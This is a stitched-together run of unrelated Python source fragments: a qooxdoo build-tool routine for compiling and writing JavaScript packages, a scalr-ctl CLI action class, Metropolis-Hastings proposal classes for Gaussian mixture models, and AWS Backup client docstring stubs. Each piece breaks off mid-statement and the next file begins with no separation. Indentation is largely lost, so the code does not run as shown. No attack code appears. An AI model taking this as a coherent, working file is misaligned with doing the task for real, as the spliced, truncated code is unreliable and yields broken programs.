for clazz in featureMap:
self._console.debug("'%s': used features: %r" % (clazz, featureMap[clazz].keys()))
self._console.outdent()
return classList
##
# If variants optimization is done and environment/qx.AllowUrlSettings:true,
# overriding other config env keys with URL parameters will not work, as the corresponding
# calls in the code are optimized away.
def warn_if_qxAllowUrlSettings(jobObj, compConf):
env = jobObj.get("environment", {})
qxAllowUrlSettings = bool(env.get("qx.allowUrlSettings", False))
optimizeVariants = "variants" in compConf.optimize
dont_warn_this = "variants-and-url-settings" in jobObj.get("config-warnings/environment", [])
if qxAllowUrlSettings and optimizeVariants and not dont_warn_this:
self._console.warn(
"Doing variants optimization with qx.allowUrlSettings:true is partly contradictory! " +
"You will not be able to URL-override these environment keys:\n%s" % sorted(env.keys())
)
def compileClasses(classList, compConf, log_progress=lambda:None):
result = []
# warn qx.allowUrlSettings - variants optim. conflict (bug#6141)
if "variants" in compConf.optimize:
warn_if_qxAllowUrlSettings(self._job, compConf)
# do "statics" optimization out of line
if "statics" in compConf.optimize:
tmp_optimize = compConf.optimize[:]
#classList = optimizeDeadCode(classList, script._featureMap, compConf, treegen=treegenerator, log_progress=log_progress)
tmp_optimize.remove("statics")
if "variants" in tmp_optimize:
tmp_optimize.remove("variants") # has been done in optimizeDeadCode
# do the rest
for clazz in classList:
tree = clazz.optimize(clazz._tmp_tree, tmp_optimize)
code = clazz.serializeTree(tree, tmp_optimize, compConf.format)
result.append(code)
log_progress()
result = u''.join(result)
# no 'statics' optimization
else:
for clazz in classList:
code = clazz.getCode(compConf, treegen=treegenerator, featuremap=script._featureMap) # choose parser frontend
result.append(code)
log_progress()
result = u''.join(result)
return result
##
# helper log function, to log progress here, but also in compileClasses()
def log_progress(c=[0]):
c[0]+=1
self._console.dot()
##
# Go through a set of classes, and either compile some of them into
# a common .js file, constructing the URI to this file, or just construct
# the URI to the source file directly if the class matches a filter.
# Return the list of constructed URIs.
def compileAndWritePackage(package, compConf, allClassVariants, per_file_prefix):
def compileAndAdd(compiled_classes, package_uris, prelude='', wrap=''):
compiled = compileClasses(compiled_classes, compOptions, log_progress)
if wrap:
compiled = wrap % compiled
if prelude:
compiled = prelude + compiled
filename = self._computeFilePath(script, sha.getHash(compiled)[:12])
self.writePackage(compiled, filename, script)
filename = OsPath(os.path.basename(filename))
shortUri = Uri(filename.toUri())
entry = "%s:%s" % ("__out__", shortUri.encodedValue())
package_uris.append(entry)
return package_uris
##
            # Write the package data and the compiled class code into as many
            # .js files as needed, skipping source files.
def write_uris(package_data, package_classes, per_file_prefix):
sourceFilter = ClassMatchList(compConf.get("code/except", []))
compiled_classes = [] # to accumulate classes that are compiled and can go into one .js file
package_uris = [] # the uri's of the .js files of this package
for pos,clazz in enumerate(package_classes):
# class is taken from the source file
if sourceFilter.match(clazz.id):
package.has_source = True # indicate that this package has source files
# before processing the source class, cat together data and accumulated classes, if any
if package_data or compiled_classes:
if per_file_prefix:
package_data = per_file_prefix + package_data
# treat compiled classes so far
package_uris = compileAndAdd(compiled_classes, package_uris, package_data)
compiled_classes = [] # reset the collection
package_data = ""
# now, for a source class, just include the file uri
clazzRelpath = clazz.id.replace(".", "/") + ".js"
relpath = OsPath(clazzRelpath)
shortUri = Uri(relpath.toUri())
entry = "%s:%s" % (clazz.library.namespace, shortUri.encodedValue())
package_uris.append(entry)
log_progress()
# register it to be lumped together with other classes
else:
compiled_classes.append(clazz)
# finally, treat remaining to be concat'ed classes
else:
if compiled_classes:
closureWrap = ''
if isClosurePackage(package, bootPackageId(script)):
closureWrap = u'''qx.Part.$$notifyLoad("%s", function() {\n%%s\n});''' % package.id
if per_file_prefix:
# -*- coding: utf-8 -*-
import json
import re
import os
import time
import dicttoxml
from scalrctl import click, request, settings, utils, view, examples, defaults
__author__ = '<NAME>'
class MultipleClickException(click.ClickException):
def format_message(self):
return '\x1b[31m%s\x1b[39m' % self.message if settings.colored_output else self.message
def show(self, file=None):
if file is None:
file = click._compat.get_text_stderr()
click.utils.echo('%s' % self.format_message(), file=file)
class BaseAction(object):
epilog = None
def __init__(self, *args, **kwargs):
pass
def run(self, *args, **kwargs):
pass
def get_description(self):
return ''
def modify_options(self, options):
return options
def get_options(self):
return []
def validate(self):
pass
class Action(BaseAction):
raw_spec = None
# Optional. Some values like GCE imageId
# cannot be passed through command lines
prompt_for = None
# Temporary. Object definitions in YAML
# spec are not always correct
mutable_body_parts = None
# Optional, e.g. '#/definitions/GlobalVariable'
object_reference = None
dry_run = False
post_template = None
_table_columns = []
_discriminators = {}
ignored_options = ()
delete_target = None
def __init__(self, name, route, http_method, api_level, *args, **kwargs):
self.name = name
self.route = route
self.http_method = http_method
self.api_level = api_level
self.strip_metadata = False
self._init()
def _init(self):
self.raw_spec = utils.read_spec(self.api_level, ext='json')
if not self.epilog and self.http_method.upper() == 'POST':
msg = "Example: scalr-ctl {level} {name} < {name}.json"
self.epilog = msg.format(
level=self.api_level if self.api_level != 'user' else '',
name=self.name
)
def _check_arguments(self, **kwargs):
route_data = self.raw_spec['paths'][self.route]
if 'parameters' not in route_data:
return
for param in route_data['parameters']:
pattern = param.get('pattern')
param_name = param.get('name')
if pattern and param_name and param_name in kwargs:
value = str(kwargs.get(param_name, '')).strip()
matches = re.match(pattern, value)
if not matches:
matches = re.search(pattern, value, re.MULTILINE)
if not matches or len(matches.group()) != len(value):
raise click.ClickException("Invalid value for {}"
.format(param_name))
def _apply_arguments(self, **kwargs):
if kwargs.get('filters'):
for pair in kwargs.pop('filters').split(','):
kv = pair.split('=')
if len(kv) == 2:
kwargs[kv[0]] = kv[1]
if kwargs.get('columns'):
self._table_columns = kwargs.pop('columns').split(',')
if kwargs.pop('strip_metadata', False):
self.strip_metadata = True
if kwargs.pop('dryrun', False):
self.dry_run = True
if kwargs.pop('debug', None):
settings.debug_mode = True
if kwargs.pop('nocolor', None):
settings.colored_output = False
if kwargs.get('transformation'):
settings.view = kwargs.pop('transformation')
return kwargs
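    # A brief sketch of the filter handling above (values are illustrative): passing
    # --filters type=ebs,size=8 arrives here as kwargs['filters'] = 'type=ebs,size=8' and is
    # exploded into kwargs['type'] = 'ebs' and kwargs['size'] = '8' before the request is built.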
def _get_object(self, *args, **kwargs):
try:
obj = self.__class__(name='get', route=self.route,
http_method='get', api_level=self.api_level)
raw_text = obj.run(*args, **kwargs)
utils.debug(raw_text)
if raw_text is None:
return {}
json_text = json.loads(raw_text)
filtered = self._filter_json_object(json_text['data'],
filter_createonly=True)
return json.dumps(filtered, indent=2)
except Exception as e:
utils.reraise(e)
def _edit_object(self, *args, **kwargs):
raw_object = self._get_object(*args, **kwargs)
raw_object = click.edit(raw_object)
if raw_object is None:
raise ValueError("No changes in JSON")
return json.loads(raw_object)
def _edit_example(self):
commentary = examples.create_post_example(self.api_level, self.route)
text = click.edit(commentary)
if text:
raw_object = "".join([line for line in text.splitlines()
if not line.startswith("#")]).strip()
else:
raw_object = ""
return json.loads(raw_object)
@staticmethod
def _read_object():
"""
Reads JSON object from stdin.
"""
raw_object = click.get_text_stream('stdin').read()
return json.loads(raw_object)
    def _format_errmsg(self, errors):
        messages = []
        for num, error_data in enumerate(errors, 1):
            err_code = '%s:' % error_data['code'] if 'code' in error_data else ''
            err_msg = error_data.get('message', '')
            err_index = ':' if len(errors) == 1 else ' %s:' % num
            err_line = 'Error%s %s %s' % (err_index, err_code, err_msg)
            messages.append(err_line)
        return '\n'.join(messages)
def _format_response(self, response, hidden=False, **kwargs):
text = None
if response:
try:
response_json = json.loads(response)
except ValueError:
utils.debug("Server response: {}".format(str(response)))
utils.reraise("Invalid server response")
errors = response_json.get('errors')
warnings = response_json.get('warnings') # type: list[dict]
if warnings:
utils.warning(*warnings)
if errors:
errmsg = self._format_errmsg(errors)
error = MultipleClickException(errmsg)
error.code = 1
raise error
if not hidden:
utils.debug(response_json.get('meta'))
if self.strip_metadata and self.http_method.upper() == 'GET' and \
settings.view in ('raw', 'json', 'xml') and 'data' in response_json: # SCALRCORE-10392
response_json = response_json['data']
response = json.dumps(response_json)
if hidden:
pass
elif settings.view in ('raw', 'json'):
click.echo(response)
elif settings.view == 'xml':
click.echo(dicttoxml.dicttoxml(response_json))
elif settings.view == 'tree':
data = json.dumps(response_json.get('data'))
click.echo(view.build_tree(data))
elif settings.view == 'table':
columns = self._table_columns or self._get_column_names()
if self._returns_iterable():
rows, current_page, last_page = view.calc_vertical_table(response_json,
columns)
pre = "Page: {} of {}".format(current_page, last_page)
click.echo(view.build_vertical_table(columns, rows, pre=pre)) # XXX
else:
click.echo(view.build_horizontal_table(
view.calc_horizontal_table(response_json, columns)))
elif self.http_method.upper() == 'DELETE':
deleted_id = kwargs.get(self.delete_target, '') or ''
if not deleted_id:
for param, value in kwargs.items():
if 'Id' in param and param not in ('envId', 'accountId'):
deleted_id = value
break
if not deleted_id:
for param, value in kwargs.items():
if 'Name' in param:
deleted_id = value
break
text = "Deleted {}".format(deleted_id)
return text
def _get_default_options(self):
options = []
for param in self._get_raw_params():
option = click.Option(('--{}'.format(param['name']),
param['name']), required=param['required'],
help=param['description'],
default=param.get('default'),
show_default='default' in param)
options.append(option)
return options
def _get_custom_options(self):
options = []
if self.http_method.upper() in ('POST', 'PATCH'):
stdin = click.Option(('--stdin', 'stdin'),
is_flag=True, required=False,
help="Read JSON data from standart console "
"input instead of editing it in the "
"default console text editor.")
options.append(stdin)
"""
interactive = click.Option(('--interactive', 'interactive'),
is_flag=True, required=False,
help="Edit JSON data in the default "
"console text editor before "
"sending POST request to server.")
options.append(interactive)
"""
if self.http_method.upper() == 'GET':
if self._returns_iterable():
maxres = click.Option(('--max-results', 'maxResults'),
type=int, required=False,
help="Maximum number of records. "
"Example: --max-results=2")
options.append(maxres)
pagenum = click.Option(('--page-number', 'pageNum'), type=int,
required=False, help="Current page "
"number. Example: --page-number=3")
options.append(pagenum)
filters = self._get_available_filters()
if filters:
filters = sorted(filters)
filter_help = ("Apply filters. Example: type=ebs,size=8."
"Available filters: {}."
).format(', '.join(filters))
filters = click.Option(('--filters', 'filters'),
required=False, help=filter_help)
options.append(filters)
columns_help = ("Filter columns in table view "
"[--table required]. Example: NAME,SIZE,"
"SCOPE. Available columns: {}."
).format(', '.join(self._get_column_names()))
columns = click.Option(('--columns', 'columns'),
required=False, help=columns_help)
options.append(columns)
raw = click.Option(('--raw', 'transformation'), is_flag=True,
flag_value='raw', default=False, hidden=True,
help="Print raw response")
json_ = click.Option(('--json', 'transformation'), is_flag=True,
flag_value='raw', default=False,
help="Print raw response")
strip_metadata = click.Option(('--no-envelope', 'strip_metadata'), is_flag=True, default=False,
help="Strip server response from all metadata.")
xml = click.Option(('--xml', 'transformation'), is_flag=True,
flag_value='xml', default=False,
help="Print response as a XML")
tree = click.Option(('--tree', 'transformation'), is_flag=True,
flag_value='tree', default=False,
help="Print response as a colored tree")
nocolor = click.Option(('--nocolor', 'nocolor'), is_flag=True,
default=False, help="Use colors")
options += [raw, tree, nocolor, json_, xml, strip_metadata]
if self.name not in ('get', 'retrieve'): # [ST-54] [ST-102]
table = click.Option(('--table', 'transformation'),
is_flag=True, flag_value='table',
default=False,
help="Print response as a colored table")
options.append(table)
debug = click.Option(('--debug', 'debug'), is_flag=True,
default=False, help="Print debug messages")
options.append(debug)
return options
def _get_body_type_params(self):
route_data = self.raw_spec['paths'][self.route][self.http_method]
        return list(route_data.get('parameters', []))
def _get_path_type_params(self):
route_data = self.raw_spec['paths'][self.route]
        return list(route_data.get('parameters', []))
def _get_raw_params(self):
result = self._get_path_type_params()
if self.http_method.upper() in ('GET', 'DELETE'):
body_params = self._get_body_type_params()
result.extend(body_params)
return result
def _returns_iterable(self):
responses = self.raw_spec['paths'][self.route][self.http_method]['responses']
if '200' in responses:
response_200 = responses['200']
if 'schema' in response_200:
schema = response_200['schema']
if '$ref' in schema:
object_key = schema['$ref'].split('/')[-1]
object_descr = self.raw_spec['definitions'][object_key]
object_properties = object_descr['properties']
data_structure = object_properties['data']
return 'array' == data_structure.get('type')
return False
def _get_available_filters(self):
if self._returns_iterable():
data = self._result_descr['properties']['data']
response_ref = data['items']['$ref']
response_descr = self._lookup(response_ref)
if 'x-filterable' in response_descr:
return response_descr['x-filterable']
return []
def _get_column_names(self):
data = self._result_descr['properties']['data']
# XXX: Inconsistency in swagger spec.
# See RoleDetailsResponse vs RoleCategoryListResponse
response_ref = data['items']['$ref'] \
if 'items' in data else data['$ref']
response_descr = self._lookup(response_ref)
properties = response_descr['properties']
column_names = []
for k, v in properties.items():
if '$ref' not in v:
column_names.append(k)
else: # ST-226
f_key = self._lookup(v['$ref'])
if "properties" in f_key:
if len(f_key["properties"]) == 1:
if "id" in f_key["properties"]:
if "type" in f_key["properties"]["id"]:
if f_key["properties"]["id"]["type"] in ("integer", "string"):
column_names.append("%s.id" % k)
return column_names
def _lookup(self, response_ref):
"""
        Returns a document section.
        Example: #/definitions/Image returns the Image definition section.
"""
if response_ref.startswith('#'):
paths = response_ref.split('/')[1:]
result = self.raw_spec
for path in paths:
if path not in result:
return
result = result[path]
return result
@property
def _result_descr(self):
route_data = self.raw_spec['paths'][self.route]
if self.http_method == 'post':
data_block = route_data.get('get', route_data['post']) # XXX: non-CRUD actions e.g. farm launch
else:
data_block = route_data[self.http_method]
responses = data_block['responses']
if '200' in responses:
response_200 = responses['200']
if 'schema' in response_200:
schema = response_200['schema']
if '$ref' in schema:
response_ref = schema['$ref']
return self._lookup(response_ref)
def _list_concrete_types(self, schema):
types = []
if "x-concreteTypes" in schema:
for ref_dict in schema["x-concreteTypes"]:
ref_link = ref_dict['$ref']
types += [link.split("/")[-1] for link in self._list_concrete_types_recursive(ref_link)]
return types
def _list_concrete_types_recursive(self, reference):
references = []
schema = self._lookup(reference)
if "x-concreteTypes" not in schema:
references.append(reference)
else:
for ref_dict in schema["x-concreteTypes"]:
references += self._list_concrete_types_recursive(ref_dict['$ref'])
return references
def _filter_json_object(self, data, filter_createonly=False,
schema=None, reference=None):
"""
Removes immutable parts from JSON object
before sending it in POST or PATCH.
"""
filtered = {}
# load `schema`
if schema is None:
            for
import numpy as np
from gmmmc.gmm import GMM
from gmmmc.proposals.proposals import Proposal
import logging
class GaussianStepMeansProposal(Proposal):
"""Gaussian Proposal distribution for means of a GMM"""
def __init__(self, step_sizes=(0.001,)):
"""
Gaussian proposal distribution for the means. The multivariate Gaussian is centered at the means of the current
state in the Markov Chain and has covariance given by step_sizes. Multiple step sizes can be specified.
The proposal algorithm will take these steps in the sequence specified in step_sizes.
Parameters
----------
step_sizes : 1-D array_like
            Iterable containing the sequence of step sizes (covariances of the Gaussian proposal distribution)
"""
super(GaussianStepMeansProposal, self).__init__()
self.step_sizes = step_sizes
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of GMM means.
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object initialised with new mean parameters.
"""
new_means = np.array(gmm.means)
beta = target.beta
prior = target.prior
steps = [np.random.multivariate_normal(np.zeros(gmm.n_features),
step_size * np.eye(gmm.n_features),
size=gmm.n_mixtures)
for step_size in self.step_sizes]
# calculation of prior probabilities of only the means, since only means will change
log_priors = np.array([prior.means_prior.log_prob_single(gmm.means[mixture], mixture) for mixture in xrange(gmm.n_mixtures)])
log_prob_priors = np.sum(log_priors)
previous_prob = beta * gmm.log_likelihood(X, n_jobs) + np.sum(log_priors)
for i, step in enumerate(steps):
for mixture in xrange(gmm.n_mixtures):
self.count_proposed[i] += 1
# propose new means
new_mixture_means = gmm.means[mixture] + step[mixture]
# try out the new means
proposed_means = np.array(new_means)
proposed_means[mixture] = new_mixture_means
proposed_gmm = GMM(proposed_means, np.array(gmm.covars), np.array(gmm.weights))
# calculate new prior
new_log_prob_mixture = prior.means_prior.log_prob_single(new_mixture_means, mixture)
new_log_prob_priors = log_prob_priors - log_priors[mixture] + new_log_prob_mixture
# priors
proposed_prob = beta * proposed_gmm.log_likelihood(X, n_jobs) + new_log_prob_priors
# ratio
ratio = proposed_prob - previous_prob
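                # Metropolis acceptance in log space: accept when the log-ratio
                # exceeds log(u) with u ~ Uniform(0, 1); the `ratio > 0` test only
                # short-circuits the random draw, since log(u) <= 0 always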
if ratio > 0 or ratio > np.log(np.random.uniform()):
# accept proposal
new_means = proposed_means
previous_prob = proposed_prob
# update prior probability calculation
log_prob_priors = new_log_prob_priors
log_priors[mixture] = new_log_prob_mixture
self.count_accepted[i] += 1
return GMM(new_means, np.array(gmm.covars), np.array(gmm.weights))
class GaussianStepCovarProposal(Proposal):
def __init__(self, step_sizes=(0.001,)):
"""
Gaussian proposal function for the covariances of the GMM.
Parameters
----------
step_sizes : array_like
Array of covariance values for the Gaussian proposal.
"""
super(GaussianStepCovarProposal, self).__init__()
self.step_sizes = step_sizes
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of GMM covariances (diagonal only).
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object initialised with new covariance parameters.
"""
new_covars = np.array(gmm.covars)
beta = target.beta
prior = target.prior
        steps = [np.random.multivariate_normal(np.zeros(gmm.n_features),
                                               step_size * np.eye(gmm.n_features),
                                               size=gmm.n_mixtures) for step_size in self.step_sizes]
        # prior probabilities of only the covariances, since only the covariances
        # change here; the constant means/weights prior terms cancel in the MH
        # ratio, so proposed and previous probabilities must use the same partial prior
        log_priors = np.array([prior.covars_prior.log_prob_single(gmm.covars[mixture], mixture)
                               for mixture in xrange(gmm.n_mixtures)])
        log_prob_priors = np.sum(log_priors)
        previous_prob = beta * gmm.log_likelihood(X, n_jobs) + log_prob_priors
for i, step in enumerate(steps):
for mixture in xrange(gmm.n_mixtures):
self.count_proposed[i] += 1
# propose new covars
new_mixture_covars = gmm.covars[mixture] + step[mixture]
if (new_mixture_covars > 0).all(): # check covariances are valid
# try out the new covars
proposed_covars = np.array(new_covars)
proposed_covars[mixture] = new_mixture_covars
proposed_gmm = GMM(np.array(gmm.means), proposed_covars, np.array(gmm.weights))
# calculate desired distribution
new_log_prob_mixture = prior.covars_prior.log_prob_single(new_mixture_covars, mixture)
new_log_prob_priors = log_prob_priors - log_priors[mixture] + new_log_prob_mixture
proposed_prob = beta * proposed_gmm.log_likelihood(X, n_jobs) + new_log_prob_priors
# ratio
ratio = proposed_prob - previous_prob
if ratio > 0 or ratio > np.log(np.random.uniform()):
# accept proposal
new_covars = proposed_covars
previous_prob = proposed_prob
log_prob_priors = new_log_prob_priors
log_priors[mixture] = new_log_prob_mixture
self.count_accepted[i] += 1
else:
self.count_illegal[i] += 1
return GMM(np.array(gmm.means), np.array(new_covars), np.array(gmm.weights))
class GaussianStepWeightsProposal(Proposal):
def __init__(self, n_mixtures, step_sizes=(0.001,), threshold=0.001):
"""
Gaussian proposal function for the weights of a GMM.
Parameters
----------
n_mixtures
step_sizes
Notes
----------
The proposal function works by projecting the weight vector w onto the simplex defined by
        w_1 + w_2 + ... + w_n = 1, 0 <= w_i <= 1. The change-of-basis matrix is found by taking n-1 vectors
        lying on the plane and using Gram-Schmidt to get an orthonormal basis. A Gaussian proposal function
        in (n-1)-d space is used to find the next point on the simplex.
"""
super(GaussianStepWeightsProposal, self).__init__()
self.step_sizes = step_sizes
self.n_mixtures = n_mixtures
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
self.threshold = threshold
if n_mixtures > 1:
            # get change of basis matrix mapping n dim coordinates to n-1 dim coordinates on simplex
# x1 + x2 + x3 ..... =1
points = np.random.dirichlet([1 for i in xrange(n_mixtures)], size=n_mixtures - 1)
points = points.T
self.plane_origin = np.ones((n_mixtures)) / float(n_mixtures)
# get vectors parallel to plane from its center (1/n,1/n,....)
parallel = points - np.ones(points.shape) / float(n_mixtures)
            # do Gram-Schmidt (via QR) to get mutually orthonormal basis vectors
self.e, _ = np.linalg.qr(parallel)
def transformSimplex(self, weights):
"""
Project weight vector onto the normal simplex.
Parameters
----------
weights : array_like of shape (n_mixtures,)
vector of weights for each gaussian component
Returns
-------
: array_like of shape (n_mixtures-1,)
vector of weights projected onto the simplex plane
"""
# project onto the simplex
return np.dot(self.e.T, weights - self.plane_origin)
def invTransformSimplex(self, simplex_coords):
"""
Transforms a point on the simplex to the original vector space.
Parameters
----------
simplex_coords : array_like of shape (n_mixtures - 1,)
Coordinates of a weight vector on the simplex.
Returns
-------
: array_like of shape(n_mixtures,)
vector of weights.
"""
return self.plane_origin + np.dot(self.e, simplex_coords)
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of weight vectors.
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object initialised with new covariance parameters.
"""
accepted = False
cur_gmm = gmm
if gmm.n_mixtures > 1:
for i, step_size in enumerate(self.step_sizes):
self.count_proposed[i] += 1
current_weights_transformed = self.transformSimplex(cur_gmm.weights)
proposed_weights_transformed = np.random.multivariate_normal(current_weights_transformed,
np.eye(self.n_mixtures - 1) * step_size)
proposed_weights = self.invTransformSimplex(proposed_weights_transformed)
if np.logical_and(0 <= proposed_weights, proposed_weights <= 1).all()\
and np.isclose(np.sum(proposed_weights), 1.0) and (proposed_weights>self.threshold).all():
previous_prob = target.log_prob(X, cur_gmm, n_jobs)
proposed_gmm = GMM(np.array(cur_gmm.means), np.array(cur_gmm.covars), proposed_weights)
proposed_prob = target.log_prob(X, proposed_gmm, n_jobs)
ratio = proposed_prob - previous_prob
if ratio > 0 or ratio > np.log(np.random.uniform()):
# accept proposal
self.count_accepted[i] += 1
accepted = True
cur_gmm = proposed_gmm
else:
self.count_illegal[i] += 1
if accepted is True:
return cur_gmm
else:
return GMM(np.array(gmm.means), np.array(gmm.covars), np.array(gmm.weights))
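# A minimal, illustrative self-check (not part of the original module): weights
# on the probability simplex map to (n_mixtures - 1)-dimensional coordinates and
# back without loss, which is the invariant `propose` relies on.
if __name__ == "__main__":
    _proposal = GaussianStepWeightsProposal(n_mixtures=3)
    _w = np.array([0.2, 0.3, 0.5])                    # lies on the simplex
    _coords = _proposal.transformSimplex(_w)          # shape (2,)
    _w_back = _proposal.invTransformSimplex(_coords)  # back to shape (3,)
    assert np.allclose(_w, _w_back)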
class GaussianTuningStepMeansProposal(Proposal):
"""Gaussian Proposal distribution for means of a GMM"""
def __init__(self, step_sizes=(0.001,), limit=200):
"""
Gaussian proposal distribution for the means. The multivariate Gaussian is centered at the means of the current
state in the Markov Chain and has covariance given by step_sizes. Multiple step sizes can be specified.
The proposal algorithm will take these steps in the sequence specified in step_sizes.
Parameters
----------
step_sizes : 1-D array_like
            Iterable containing the sequence of step sizes (covariances of the Gaussian proposal distribution)
"""
super(GaussianTuningStepMeansProposal, self).__init__()
self.limit = limit
self.count_steps = 0
self.count_acceptance_bucket = np.zeros((len(step_sizes),))
self.record = []
self.step_sizes = step_sizes
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of GMM means.
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
            A new GMM object initialised with new mean parameters.
body of a backup plan. Includes a ``BackupPlanName`` and one or more sets of ``Rules`` .
- **BackupPlanName** *(string) --*
The display name of a backup plan.
- **Rules** *(list) --*
An array of ``BackupRule`` objects, each of which specifies a scheduled task that is used to back up a selection of resources.
- *(dict) --*
Specifies a scheduled task used to back up a selection of resources.
- **RuleName** *(string) --*
An optional display name for a backup rule.
- **TargetBackupVaultName** *(string) --*
The name of a logical container where backups are stored. Backup vaults are identified by names that are unique to the account used to create them and the AWS Region where they are created. They consist of lowercase letters, numbers, and hyphens.
- **ScheduleExpression** *(string) --*
A CRON expression specifying when AWS Backup initiates a backup job.
- **StartWindowMinutes** *(integer) --*
An optional value that specifies a period of time in minutes after a backup is scheduled before a job is canceled if it doesn't start successfully.
- **CompletionWindowMinutes** *(integer) --*
A value in minutes after a backup job is successfully started before it must be completed or it is canceled by AWS Backup. This value is optional.
- **Lifecycle** *(dict) --*
The lifecycle defines when a protected resource is transitioned to cold storage and when it expires. AWS Backup transitions and expires backups automatically according to the lifecycle that you define.
Backups transitioned to cold storage must be stored in cold storage for a minimum of 90 days. Therefore, the “expire after days” setting must be 90 days greater than the “transition to cold after days” setting. The “transition to cold after days” setting cannot be changed after a backup has been transitioned to cold.
- **MoveToColdStorageAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is moved to cold storage.
- **DeleteAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is deleted. Must be greater than ``MoveToColdStorageAfterDays`` .
- **RecoveryPointTags** *(dict) --*
An array of key-value pair strings that are assigned to resources that are associated with this rule when restored from backup.
- *(string) --*
- *(string) --*
- **RuleId** *(string) --*
Uniquely identifies a rule that is used to schedule the backup of a selection of resources.
- **BackupPlanId** *(string) --*
Uniquely identifies a backup plan.
- **BackupPlanArn** *(string) --*
An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for example, ``arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50`` .
- **VersionId** *(string) --*
Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most 1,024 bytes long. Version IDs cannot be edited.
- **CreatorRequestId** *(string) --*
A unique string that identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
- **CreationDate** *(datetime) --*
The date and time that a backup plan is created, in Unix format and Coordinated Universal Time (UTC). The value of ``CreationDate`` is accurate to milliseconds. For example, the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
- **DeletionDate** *(datetime) --*
The date and time that a backup plan is deleted, in Unix format and Coordinated Universal Time (UTC). The value of ``CreationDate`` is accurate to milliseconds. For example, the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
- **LastExecutionDate** *(datetime) --*
The last time a job to back up resources was executed with this backup plan. A date and time, in Unix format and Coordinated Universal Time (UTC). The value of ``LastExecutionDate`` is accurate to milliseconds. For example, the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
:type BackupPlanId: string
:param BackupPlanId: **[REQUIRED]**
Uniquely identifies a backup plan.
:type VersionId: string
:param VersionId:
Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most 1,024 bytes long. Version IDs cannot be edited.
:rtype: dict
:returns:
"""
pass
def get_backup_plan_from_json(self, BackupPlanTemplateJson: str) -> Dict:
"""
Returns a valid JSON document specifying a backup plan or an error.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromJSON>`_
**Request Syntax**
::
response = client.get_backup_plan_from_json(
BackupPlanTemplateJson='string'
)
**Response Syntax**
::
{
'BackupPlan': {
'BackupPlanName': 'string',
'Rules': [
{
'RuleName': 'string',
'TargetBackupVaultName': 'string',
'ScheduleExpression': 'string',
'StartWindowMinutes': 123,
'CompletionWindowMinutes': 123,
'Lifecycle': {
'MoveToColdStorageAfterDays': 123,
'DeleteAfterDays': 123
},
'RecoveryPointTags': {
'string': 'string'
},
'RuleId': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **BackupPlan** *(dict) --*
Specifies the body of a backup plan. Includes a ``BackupPlanName`` and one or more sets of ``Rules`` .
- **BackupPlanName** *(string) --*
The display name of a backup plan.
- **Rules** *(list) --*
An array of ``BackupRule`` objects, each of which specifies a scheduled task that is used to back up a selection of resources.
- *(dict) --*
Specifies a scheduled task used to back up a selection of resources.
- **RuleName** *(string) --*
An optional display name for a backup rule.
- **TargetBackupVaultName** *(string) --*
The name of a logical container where backups are stored. Backup vaults are identified by names that are unique to the account used to create them and the AWS Region where they are created. They consist of lowercase letters, numbers, and hyphens.
- **ScheduleExpression** *(string) --*
A CRON expression specifying when AWS Backup initiates a backup job.
- **StartWindowMinutes** *(integer) --*
An optional value that specifies a period of time in minutes after a backup is scheduled before a job is canceled if it doesn't start successfully.
- **CompletionWindowMinutes** *(integer) --*
A value in minutes after a backup job is successfully started before it must be completed or it is canceled by AWS Backup. This value is optional.
- **Lifecycle** *(dict) --*
The lifecycle defines when a protected resource is transitioned to cold storage and when it expires. AWS Backup transitions and expires backups automatically according to the lifecycle that you define.
Backups transitioned to cold storage must be stored in cold storage for a minimum of 90 days. Therefore, the “expire after days” setting must be 90 days greater than the “transition to cold after days” setting. The “transition to cold after days” setting cannot be changed after a backup has been transitioned to cold.
- **MoveToColdStorageAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is moved to cold storage.
- **DeleteAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is deleted. Must be greater than ``MoveToColdStorageAfterDays`` .
